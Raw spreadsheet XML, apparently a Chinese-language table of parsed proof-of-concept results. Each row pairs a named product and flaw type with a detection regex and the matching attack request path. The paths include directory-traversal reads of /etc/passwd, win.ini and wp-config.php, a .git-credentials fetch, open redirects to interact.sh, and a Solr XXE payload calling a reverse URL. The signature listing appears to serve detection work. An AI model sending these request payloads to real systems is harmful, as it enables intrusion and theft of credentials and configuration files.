    <t>/Electron/download/windows/\windows\win.ini|/Electron/download/windows/..\..\..\Http\webroot\config.json</t>
  </si>
  <si>
    <t>Pacsone Server Dicom Web查看器</t>
  </si>
  <si>
    <t>Pacsone Server Dicom Web查看器_目录遍历</t>
  </si>
  <si>
    <t>.*?(?:/pacsone/nocache\.php\?path=\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2fetc%2f\.%2fzpx%2f\.\.%2fpasswd).*</t>
  </si>
  <si>
    <t>/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd</t>
  </si>
  <si>
    <t>Selea Targa Ip Ocr</t>
  </si>
  <si>
    <t>Selea Targa Ip Ocr_目录遍历</t>
  </si>
  <si>
    <t>.*?(?:/CFCARD/images/SeleaCamera/%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2fetc%2fpasswd).*</t>
  </si>
  <si>
    <t>/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd</t>
  </si>
  <si>
    <t>Softneta Meddream Pacs Server Premium</t>
  </si>
  <si>
    <t>Softneta Meddream Pacs Server Premium_目录遍历</t>
  </si>
  <si>
    <t>.*?(?:/pacs/nocache\.php\?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin\.ini).*</t>
  </si>
  <si>
    <t>/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini</t>
  </si>
  <si>
    <t>Tpshop系统</t>
  </si>
  <si>
    <t>Tpshop系统_目录遍历</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/Home/uploadify/fileList\?type=\.\+\&amp;path=\.\./).*</t>
  </si>
  <si>
    <t>/index.php/Home/uploadify/fileList?type=.+&amp;path=../</t>
  </si>
  <si>
    <t>Voyager_目录遍历</t>
  </si>
  <si>
    <t>.*?(?:/admin/voyager\-assets\?path=\.\.\.\.\.%2F%2F%2F\.\.\.\.\.%2F%2F%2F\.\.\.\.\.%2F%2F%2F\.\.\.\.\.%2F%2F%2F\.\.\.\.\.%2F%2F%2F\.\.\.\.\.%2F%2F%2F\.\.\.\.\.%2F%2F%2F\.\.\.\.\.%2F%2F%2F\.\.\.\.\.%2F%2F%2Fetc/passwd).*</t>
  </si>
  <si>
    <t>Wordpress_目录遍历</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\-ajax\.php\?jvfrm_spot_get_json\&amp;fn=\.\./\.\./wp\-config\.php\&amp;callback=jQuery).*</t>
  </si>
  <si>
    <t>帆软_目录遍历</t>
  </si>
  <si>
    <t>.*?(?:/report/ReportServer\?op=chart\&amp;cmd=get_geo_json\&amp;resourcepath=privilege\.xml).*</t>
  </si>
  <si>
    <t>/report/ReportServer?op=chart&amp;cmd=get_geo_json&amp;resourcepath=privilege.xml</t>
  </si>
  <si>
    <t>Spring_目录遍历</t>
  </si>
  <si>
    <t>.*?(?:/weaver/org\.springframework\.web\.servlet\.ResourceServlet\?resource=/WEB\-INF/web\.xml).*</t>
  </si>
  <si>
    <t>泛微OA_目录遍历</t>
  </si>
  <si>
    <t>.*?(?:/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree\.jsp\?dir=/page/resource/userfile/\.\./\.\./).*</t>
  </si>
  <si>
    <t>/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../</t>
  </si>
  <si>
    <t>金蝶</t>
  </si>
  <si>
    <t>金蝶_目录遍历</t>
  </si>
  <si>
    <t>.*?(?:/appmonitor/protected/selector/server_file/files\?folder=C://\&amp;suffix=|/appmonitor/protected/selector/server_file/files\?folder=/\&amp;suffix=).*</t>
  </si>
  <si>
    <t>/appmonitor/protected/selector/server_file/files?folder=C://&amp;suffix=|/appmonitor/protected/selector/server_file/files?folder=/&amp;suffix=</t>
  </si>
  <si>
    <t>Next_路径遍历</t>
  </si>
  <si>
    <t>.*?(?:/_next/static/\.\./server/pages\-manifest\.json).*</t>
  </si>
  <si>
    <t>Nuxt</t>
  </si>
  <si>
    <t>Nuxt_路径遍历</t>
  </si>
  <si>
    <t>.*?(?:/_nuxt/@fs/etc/passwd).*</t>
  </si>
  <si>
    <t>/_nuxt/@fs/etc/passwd</t>
  </si>
  <si>
    <t>Oracle_路径遍历</t>
  </si>
  <si>
    <t>.*?(?:/OA_HTML/bispgraph\.jsp%0D%0A\.js\?ifn=passwd\&amp;ifl=/etc/|/OA_HTML/bispgraph\.jsp%0D%0A\.js\?ifn=win\.ini\&amp;ifl=c:/windows/).*</t>
  </si>
  <si>
    <t>/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&amp;ifl=/etc/|/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=win.ini&amp;ifl=c:/windows/</t>
  </si>
  <si>
    <t>Sap_路径遍历</t>
  </si>
  <si>
    <t>.*?(?:/scheduler/ui/js/ffffffffbac53543/UIUtilJavaScriptJS\?\\\&amp;\.\.\\\\\\\&amp;\.\.\\\\\\\&amp;\.\.\\\\\\version\.txt).*</t>
  </si>
  <si>
    <t>/scheduler/ui/js/ffffffffbac53543/UIUtilJavaScriptJS?\&amp;..\\\&amp;..\\\&amp;..\\\version.txt</t>
  </si>
  <si>
    <t>Solr</t>
  </si>
  <si>
    <t>Solr_路径遍历</t>
  </si>
  <si>
    <t>.*?(?:/solr//\.\.;/).*</t>
  </si>
  <si>
    <t>/solr//..;/</t>
  </si>
  <si>
    <t>乌云</t>
  </si>
  <si>
    <t>乌云_路径遍历</t>
  </si>
  <si>
    <t>.*?(?:/NCFindWeb\?service=IPreAlertConfigService\&amp;filename=\.\./\.\./ierp/bin/prop\.xml).*</t>
  </si>
  <si>
    <t>Wordpress_路径遍历</t>
  </si>
  <si>
    <t>.*?(?:/wp—admin/admin—ajax\.php\?action=duplicator_download\&amp;file=/\.\./wp\-config\.php).*</t>
  </si>
  <si>
    <t>/wp—admin/admin—ajax.php?action=duplicator_download&amp;file=/../wp-config.php</t>
  </si>
  <si>
    <t>Yishaadmin</t>
  </si>
  <si>
    <t>Yishaadmin_路径遍历</t>
  </si>
  <si>
    <t>.*?(?:/admin/File/DownloadFile\?filePath=wwwroot/\.\.\./\.//\.\.\./\.//\.\.\./\.//\.\.\./\.//\.\.\./\.//\.\.\./\.//\.\.\./\.//\.\.\./\./etc/passwd\&amp;delete=0).*</t>
  </si>
  <si>
    <t>Caddy</t>
  </si>
  <si>
    <t>Caddy_开放重定向</t>
  </si>
  <si>
    <t>.*?(?://interact\.sh/%2F\.\.).*</t>
  </si>
  <si>
    <t>//interact.sh/%2F..</t>
  </si>
  <si>
    <t>open_redirect_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>Checker</t>
  </si>
  <si>
    <t>Checker_开放重定向</t>
  </si>
  <si>
    <t>.*?(?:/redirect\?to=https://malicious\.com).*</t>
  </si>
  <si>
    <t>/redirect?to=https://malicious.com</t>
  </si>
  <si>
    <t>织梦_开放重定向</t>
  </si>
  <si>
    <t>.*?(?:/plus/download\.php\?open=1\&amp;link=aHR0cHM6Ly9ldmlsLmNvbQo=|/plus/download\.php\?open=1\&amp;link=aHR0cHM6Ly9pbnRlcmFjdC5zaA==).*</t>
  </si>
  <si>
    <t>/plus/download.php?open=1&amp;link=aHR0cHM6Ly9ldmlsLmNvbQo=|/plus/download.php?open=1&amp;link=aHR0cHM6Ly9pbnRlcmFjdC5zaA==</t>
  </si>
  <si>
    <t>Homeautomation</t>
  </si>
  <si>
    <t>Homeautomation_开放重定向</t>
  </si>
  <si>
    <t>.*?(?:/homeautomation_v3_3_2/api\.php\?do=groups/toggle\&amp;groupid=1\&amp;status=1\&amp;redirect=https://example\.com/|/homeautomation_v3_3_2/api\.php\?do=groups/toggle\&amp;groupid=1\&amp;status=1\&amp;redirect=https://interact\.sh/).*</t>
  </si>
  <si>
    <t>/homeautomation_v3_3_2/api.php?do=groups/toggle&amp;groupid=1&amp;status=1&amp;redirect=https://example.com/|/homeautomation_v3_3_2/api.php?do=groups/toggle&amp;groupid=1&amp;status=1&amp;redirect=https://interact.sh/</t>
  </si>
  <si>
    <t>Http</t>
  </si>
  <si>
    <t>Http_开放重定向</t>
  </si>
  <si>
    <t>.*?(?:\?url=https://google\.fr\&amp;h=0edf27c83d4aa4699c0625d27be0e371).*</t>
  </si>
  <si>
    <t>?url=https://google.fr&amp;h=0edf27c83d4aa4699c0625d27be0e371</t>
  </si>
  <si>
    <t>Keycloak_开放重定向</t>
  </si>
  <si>
    <t>.*?(?:/auth/realms/master/protocol/openid\-connect/auth\?client_id\&amp;nonce=33e890be\-c19f\-463f\-bd0e\-7fdcd065c0fb\&amp;redirect_uri=http%3A%2F%2Finteract\.sh\&amp;response_mode=fragment\&amp;response_type=code\&amp;scope=openid\&amp;state=72526a4b\-d5b6\-4424\-90db\-cc0f7c2001a7).*</t>
  </si>
  <si>
    <t>/auth/realms/master/protocol/openid-connect/auth?client_id&amp;nonce=33e890be-c19f-463f-bd0e-7fdcd065c0fb&amp;redirect_uri=http%3A%2F%2Finteract.sh&amp;response_mode=fragment&amp;response_type=code&amp;scope=openid&amp;state=72526a4b-d5b6-4424-90db-cc0f7c2001a7</t>
  </si>
  <si>
    <t>Next_开放重定向</t>
  </si>
  <si>
    <t>.*?(?:/_next/image\?url=/\\/\\interact\.sh/\&amp;q=100\&amp;w=128\&amp;h=128).*</t>
  </si>
  <si>
    <t>Sap_开放重定向</t>
  </si>
  <si>
    <t>.*?(?:/sap/public/bc/icf/logoff\?redirecturl=https://example\.com|/sap/public/bc/icf/logoff\?redirecturl=https://interact\.sh).*</t>
  </si>
  <si>
    <t>/sap/public/bc/icf/logoff?redirecturl=https://example.com|/sap/public/bc/icf/logoff?redirecturl=https://interact.sh</t>
  </si>
  <si>
    <t>Apache_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/apache\.conf).*</t>
  </si>
  <si>
    <t>/apache.conf</t>
  </si>
  <si>
    <t>Application</t>
  </si>
  <si>
    <t>Application_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/appsettings\.json|/appsettings\.Production\.json).*</t>
  </si>
  <si>
    <t>/appsettings.json|/appsettings.Production.json</t>
  </si>
  <si>
    <t>Azure</t>
  </si>
  <si>
    <t>Azure_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/azure\-pipelines\.yml\\\\zure\-pipelines\.yml).*</t>
  </si>
  <si>
    <t>/azure-pipelines.yml\\zure-pipelines.yml</t>
  </si>
  <si>
    <t>Blazor</t>
  </si>
  <si>
    <t>Blazor_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/_framework/blazor\.boot\.json).*</t>
  </si>
  <si>
    <t>/_framework/blazor.boot.json</t>
  </si>
  <si>
    <t>Config</t>
  </si>
  <si>
    <t>Config_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/assets/config\.rbhef/config\.rb|/config\.rb).*</t>
  </si>
  <si>
    <t>/assets/config.rbhef/config.rb|/config.rb</t>
  </si>
  <si>
    <t>Credentials</t>
  </si>
  <si>
    <t>Credentials_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/credentials\.json|/assets/credentials\.json).*</t>
  </si>
  <si>
    <t>/credentials.json|/assets/credentials.json</t>
  </si>
  <si>
    <t>Environment</t>
  </si>
  <si>
    <t>Environment_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/config/environment\.rb|/environment\.rb|/redmine/config/environment\.rb).*</t>
  </si>
  <si>
    <t>/config/environment.rb|/environment.rb|/redmine/config/environment.rb</t>
  </si>
  <si>
    <t>Froxlor</t>
  </si>
  <si>
    <t>Froxlor_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/install/froxlor\.sql).*</t>
  </si>
  <si>
    <t>/install/froxlor.sql</t>
  </si>
  <si>
    <t>Joomla_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/administrator/manifests/files/joomla\.xml).*</t>
  </si>
  <si>
    <t>/administrator/manifests/files/joomla.xml</t>
  </si>
  <si>
    <t>Nuget</t>
  </si>
  <si>
    <t>Nuget_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/packages\.configuget/packages\.config).*</t>
  </si>
  <si>
    <t>/packages.configuget/packages.config</t>
  </si>
  <si>
    <t>Phpunit</t>
  </si>
  <si>
    <t>Phpunit_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/phpunit\.xml).*</t>
  </si>
  <si>
    <t>/phpunit.xml</t>
  </si>
  <si>
    <t>Platformio</t>
  </si>
  <si>
    <t>Platformio_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/platformio\.ini).*</t>
  </si>
  <si>
    <t>/platformio.ini</t>
  </si>
  <si>
    <t>Pnpm</t>
  </si>
  <si>
    <t>Pnpm_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/pnpm\-lock\.yaml).*</t>
  </si>
  <si>
    <t>/pnpm-lock.yaml</t>
  </si>
  <si>
    <t>nodejs_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>Production</t>
  </si>
  <si>
    <t>Production_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/log/production\.log|/production\.log|/logs/production\.log).*</t>
  </si>
  <si>
    <t>/log/production.log|/production.log|/logs/production.log</t>
  </si>
  <si>
    <t>Proftpd</t>
  </si>
  <si>
    <t>Proftpd_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/proftpd\.conf).*</t>
  </si>
  <si>
    <t>/proftpd.conf</t>
  </si>
  <si>
    <t>启航</t>
  </si>
  <si>
    <t>启航_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/QH\.aspx\?responderId=ResourceNewResponder\&amp;action=download\&amp;fileName=\.%2fQH\.aspx).*</t>
  </si>
  <si>
    <t>Ruby</t>
  </si>
  <si>
    <t>Ruby_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/railsapp/config/storage\.yml|/config/storage\.yml|/ruby/config/storage\.yml|/storage\.yml).*</t>
  </si>
  <si>
    <t>/railsapp/config/storage.yml|/config/storage.yml|/ruby/config/storage.yml|/storage.yml</t>
  </si>
  <si>
    <t>ruby_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>Sftp</t>
  </si>
  <si>
    <t>Sftp_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/sftp\-config\.json).*</t>
  </si>
  <si>
    <t>/sftp-config.json</t>
  </si>
  <si>
    <t>Snyk</t>
  </si>
  <si>
    <t>Snyk_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/\.snyk).*</t>
  </si>
  <si>
    <t>/.snyk</t>
  </si>
  <si>
    <t>Sound</t>
  </si>
  <si>
    <t>Sound_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/CGI\-bin/loghandler\.php\?ajax=251\&amp;file=/mnt/old\-root/etc/passwd).*</t>
  </si>
  <si>
    <t>/CGI-bin/loghandler.php?ajax=251&amp;file=/mnt/old-root/etc/passwd</t>
  </si>
  <si>
    <t>Styleci</t>
  </si>
  <si>
    <t>Styleci_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/\.styleci\.yml).*</t>
  </si>
  <si>
    <t>/.styleci.yml</t>
  </si>
  <si>
    <t>Symfony_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/config/properties\.ini|/properties\.ini).*</t>
  </si>
  <si>
    <t>/config/properties.ini|/properties.ini</t>
  </si>
  <si>
    <t>.*?(?:/config/security\.yml|/app/config/security\.yml|/security\.yml).*</t>
  </si>
  <si>
    <t>/config/security.yml|/app/config/security.yml|/security.yml</t>
  </si>
  <si>
    <t>Wadl</t>
  </si>
  <si>
    <t>Wadl_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/application\.wadl).*</t>
  </si>
  <si>
    <t>/application.wadl</t>
  </si>
  <si>
    <t>Yarn</t>
  </si>
  <si>
    <t>Yarn_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/yarn\.lock).*</t>
  </si>
  <si>
    <t>/yarn.lock</t>
  </si>
  <si>
    <t>Github身份认证配置</t>
  </si>
  <si>
    <t>Github身份认证配置_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/\.git\-credentials).*</t>
  </si>
  <si>
    <t>/.git-credentials</t>
  </si>
  <si>
    <t>AppCMS</t>
  </si>
  <si>
    <t>AppCMS_文件泄露</t>
  </si>
  <si>
    <t>.*?(?:/backup/appcms\.sql).*</t>
  </si>
  <si>
    <t>/backup/appcms.sql</t>
  </si>
  <si>
    <t>Bt742 Pma系统</t>
  </si>
  <si>
    <t>Bt742 Pma系统_未授权访问</t>
  </si>
  <si>
    <t>.*?(?:/pma/).*</t>
  </si>
  <si>
    <t>/pma/</t>
  </si>
  <si>
    <t>Citrix系统</t>
  </si>
  <si>
    <t>CVE-2020-8193</t>
  </si>
  <si>
    <t>Citrix系统_未授权访问_CVE-2020-8193</t>
  </si>
  <si>
    <t>.*?(?:/pcidss/report\?type=allprofiles\&amp;sid=loginchallengeresponse1requestbody\&amp;username=nsroot\&amp;set=1).*</t>
  </si>
  <si>
    <t>/pcidss/report?type=allprofiles&amp;sid=loginchallengeresponse1requestbody&amp;username=nsroot&amp;set=1</t>
  </si>
  <si>
    <t>Discuz！_未授权访问</t>
  </si>
  <si>
    <t>.*?(?:/plugin\.php\?id=wechat:wechat\&amp;ac=wxregister).*</t>
  </si>
  <si>
    <t>/plugin.php?id=wechat:wechat&amp;ac=wxregister</t>
  </si>
  <si>
    <t>Etcd系统</t>
  </si>
  <si>
    <t>Etcd系统_未授权访问</t>
  </si>
  <si>
    <t>.*?(?:/v2/keys/randomLowercase\(32\)/randomLowercase\(32\)\?quorum=false\&amp;recursive=false\&amp;sorted=false|/v2/keys/randomLowercase\(32\)/randomLowercase\(32\)\?prevExist=false|/v2/keys/randomLowercase\(32\)\?dir=true).*</t>
  </si>
  <si>
    <t>/v2/keys/randomLowercase(32)/randomLowercase(32)?quorum=false&amp;recursive=false&amp;sorted=false|/v2/keys/randomLowercase(32)/randomLowercase(32)?prevExist=false|/v2/keys/randomLowercase(32)?dir=true</t>
  </si>
  <si>
    <t>Phpmyadmin</t>
  </si>
  <si>
    <t>Phpmyadmin_未授权访问</t>
  </si>
  <si>
    <t>.*?(?:/phpMyAdmin/index\.php).*</t>
  </si>
  <si>
    <t>/phpMyAdmin/index.php</t>
  </si>
  <si>
    <t>Springboot</t>
  </si>
  <si>
    <t>Springboot_未授权访问</t>
  </si>
  <si>
    <t>.*?(?:/actuator/env|/env).*</t>
  </si>
  <si>
    <t>/actuator/env|/env</t>
  </si>
  <si>
    <t>Swagger Ui</t>
  </si>
  <si>
    <t>Swagger Ui_未授权访问</t>
  </si>
  <si>
    <t>.*?(?:swagger/v1/swagger\.yaml|swagger/v1/swagger\.json|actuator/swagger\-ui\.html|swagger/swagger\-ui\.html|api/index\.html|api/docs/|swagger\.json|api\-docs/swagger\.yaml|api/swagger\-ui\.html|libs/swagger\-ui\.html|swagger\-ui\.html|web/swagger\-ui\.html|swagger/ui/index|api\-docs/swagger\.json|template/swagger\-ui\.html|api_docs|swagger\.yaml|service/swagger\-ui\.html).*</t>
  </si>
  <si>
    <t>swagger/v1/swagger.yaml|swagger/v1/swagger.json|actuator/swagger-ui.html|swagger/swagger-ui.html|api/index.html|api/docs/|swagger.json|api-docs/swagger.yaml|api/swagger-ui.html|libs/swagger-ui.html|swagger-ui.html|web/swagger-ui.html|swagger/ui/index|api-docs/swagger.json|template/swagger-ui.html|api_docs|swagger.yaml|service/swagger-ui.html</t>
  </si>
  <si>
    <t>金和OA_未授权访问</t>
  </si>
  <si>
    <t>.*?(?:/C6/ajax/UserWebControl\.UserSelect\.AjaxServiceMethod,UserWebControl\.UserSelect\.ashx\?_method=GetDepartDataByDeptID\&amp;_session=no).*</t>
  </si>
  <si>
    <t>/C6/ajax/UserWebControl.UserSelect.AjaxServiceMethod,UserWebControl.UserSelect.ashx?_method=GetDepartDataByDeptID&amp;_session=no</t>
  </si>
  <si>
    <t>启智堡垒机</t>
  </si>
  <si>
    <t>启智堡垒机_未授权访问</t>
  </si>
  <si>
    <t>.*?(?:/audit/gui_detail_view\.php\?token=1\&amp;id=%5C\&amp;uid=%2Cchr\(97\)\)%20or%201:%20print%20chr\(121\)%2bchr\(101\)%2bchr\(115\)%0d%0a%23\&amp;login=shterm).*</t>
  </si>
  <si>
    <t>/audit/gui_detail_view.php?token=1&amp;id=%5C&amp;uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&amp;login=shterm</t>
  </si>
  <si>
    <t>通达OA_未授权访问</t>
  </si>
  <si>
    <t>.*?(?:/general/calendar/arrange/get_cal_list\.php\?starttime=1548058874\&amp;endtime=33165447106\&amp;view=agendaDay).*</t>
  </si>
  <si>
    <t>/general/calendar/arrange/get_cal_list.php?starttime=1548058874&amp;endtime=33165447106&amp;view=agendaDay</t>
  </si>
  <si>
    <t>致远OA_未授权访问</t>
  </si>
  <si>
    <t>.*?(?:/seeyon/personalBind\.do\.jpg/\.\.;/ajax\.do\?method=ajaxAction\&amp;managerName=mMOneProfileManager\&amp;managerMethod=getOAProfile|/seeyon/thirdpartyController\.do\.css/\.\.;/ajax\.do).*</t>
  </si>
  <si>
    <t>/seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&amp;managerName=mMOneProfileManager&amp;managerMethod=getOAProfile|/seeyon/thirdpartyController.do.css/..;/ajax.do</t>
  </si>
  <si>
    <t>Aem Package Manager</t>
  </si>
  <si>
    <t>Aem Package Manager_未授权访问</t>
  </si>
  <si>
    <t>.*?(?:/crx/packmgr/list\.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa\.css\?_dc=1615863080856\&amp;_charset_=utf\-8\&amp;includeVersions=true|/content/\.\.;/crx/packmgr/list\.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa\.css\?_dc=1615863080856\&amp;_charset_=utf\-8\&amp;includeVersions=true).*</t>
  </si>
  <si>
    <t>/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&amp;_charset_=utf-8&amp;includeVersions=true|/content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&amp;_charset_=utf-8&amp;includeVersions=true</t>
  </si>
  <si>
    <t>Kentico Xperience CMS</t>
  </si>
  <si>
    <t>Kentico Xperience CMS_未授权访问</t>
  </si>
  <si>
    <t>.*?(?:/CMSPages/Staging/SyncServer\.asmx).*</t>
  </si>
  <si>
    <t>/CMSPages/Staging/SyncServer.asmx</t>
  </si>
  <si>
    <t>Thinvnc</t>
  </si>
  <si>
    <t>Thinvnc_未授权访问</t>
  </si>
  <si>
    <t>.*?(?:/webgrind/index\.php\?op=fileviewer\&amp;file=/etc/passwd).*</t>
  </si>
  <si>
    <t>/webgrind/index.php?op=fileviewer&amp;file=/etc/passwd</t>
  </si>
  <si>
    <t>Viewlinc</t>
  </si>
  <si>
    <t>Crlf注入</t>
  </si>
  <si>
    <t>Viewlinc_Crlf注入</t>
  </si>
  <si>
    <t>.*?(?:/%0ASet\-Cookie:crlfinjection=crlfinjection).*</t>
  </si>
  <si>
    <t>/%0ASet-Cookie:crlfinjection=crlfinjection</t>
  </si>
  <si>
    <t>crlf_injection_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>内容欺骗</t>
  </si>
  <si>
    <t>Bitrix_内容欺骗</t>
  </si>
  <si>
    <t>.*?(?:/bitrix/components/bitrix/mobileapp\.list/ajax\.php\?items\[1\]\[TITLE\]=PLEASE\+CLICK\+HERE!\&amp;items\[1\]\[DETAIL_LINK\]=http://example\.com).*</t>
  </si>
  <si>
    <t>/bitrix/components/bitrix/mobileapp.list/ajax.php?items[1][TITLE]=PLEASE+CLICK+HERE!&amp;items[1][DETAIL_LINK]=http://example.com</t>
  </si>
  <si>
    <t xml:space="preserve">Sonicwall </t>
  </si>
  <si>
    <t>破壳</t>
  </si>
  <si>
    <t>Sonicwall_破壳</t>
  </si>
  <si>
    <t>.*?(?:/CGI\-bin/jarrewrite\.sh).*</t>
  </si>
  <si>
    <t>/CGI-bin/jarrewrite.sh</t>
  </si>
  <si>
    <t>Xml外部实体注入</t>
  </si>
  <si>
    <t>Solr_Xml外部实体注入</t>
  </si>
  <si>
    <t>.*?(?:/solr/\{\{core\}\}/select\?q=%3C%3Fxml%20version%3D%221\.0%22%20encoding%3D%22UTF\-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22\{\{reverseURL\}\}%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E\&amp;wt=xml\&amp;defType=xmlparser).*</t>
  </si>
  <si>
    <t>/solr/admin/cores?wt=json|/solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22{{reverseURL}}%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&amp;wt=xml&amp;defType=xmlparser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</si>
</sst>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8"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="D8" sqref="D8"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14" outlineLevelCol="5"/>
  <cols>
    <col min="1" max="3" width="19.7272727272727" style="2" customWidth="1"/>
    <col min="4" max="4" width="37.0909090909091" style="2" customWidth="1"/>
    <col min="5" max="5" width="255" style="4" customWidth="1"/>
    <col min="6" max="16365" width="9" style="4"/>
  </cols>
  <sheetData>
    <row r="1" s="4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4" customFormat="1" spans="1:6">
      <c r="A2" s="2" t="s">
        <v>6</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>8</v>
      </c>
      <c r="D2" s="2" t="str">
        <f t="shared" ref="D2:D65" si="0">_xlfn.TEXTJOIN("_",TRUE,A2:C2)</f>
        <v>大华_SQL注入_CNVD-2017-06001</v>
      </c>
      <c r="E2" s="6" t="s">
        <v>9</v>
      </c>
      <c r="F2" s="4" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="3" s="4" customFormat="1" spans="1:6">
      <c r="A3" s="2" t="s">
        <v>11</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>12</v>
      </c>
      <c r="D3" s="2" t="str">
        <f t="shared" si="0"/>
        <v>宏景_SQL注入_CNVD-2023-08743</v>
      </c>
      <c r="E3" s="6" t="s">
        <v>13</v>
      </c>
      <c r="F3" s="4" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="4" s="4" customFormat="1" spans="1:6">
      <c r="A4" s="2" t="s">
        <v>15</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>16</v>
      </c>
      <c r="D4" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Gogs (Go Git Service)_SQL注入_CVE-2014-8682</v>
      </c>
      <c r="E4" s="6" t="s">
        <v>17</v>
      </c>
      <c r="F4" s="4" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="5" s="4" customFormat="1" spans="1:6">
      <c r="A5" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>20</v>
      </c>
      <c r="D5" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Joomla_SQL注入_CVE-2015-7297</v>
      </c>
      <c r="E5" s="6" t="s">
        <v>21</v>
      </c>
      <c r="F5" s="4" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="6" s="4" customFormat="1" spans="1:6">
      <c r="A6" s="2" t="s">
        <v>23</v>
      </c>
      <c r="B6" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>24</v>
      </c>
      <c r="D6" s="2" t="str">
        <f t="shared" si="0"/>
        <v>Zabbix_SQL注入_CVE-2016-10134</v>
      </c>
      <c r="E6" s="6" t="s">
        <v>25</v>
      </c>
      <c r="F6" s="4" t="s">
        <v>26</v>
      </c>
    </row>
    <row r="7" s="4" customFormat="1" spans="1:6">
      <c r="A7" s="2" t="s">
        <v>27</v>
      </c>
      <c r="B7" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>28</v>
      </c>
      <c r="D7" s="2" t="str">
        <f t="shared" si="0"/>
        <v>织梦_SQL注入_CVE-2017-17731</v>
      </c>
      <c r="E7" s="6" t="s">
        <v>29</v>
      </c>
      <c r="F7" s="4" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="8" s="4" customFormat="1" spans="1:6">
      <c r="A8" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B8" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>31</v>
      </c>
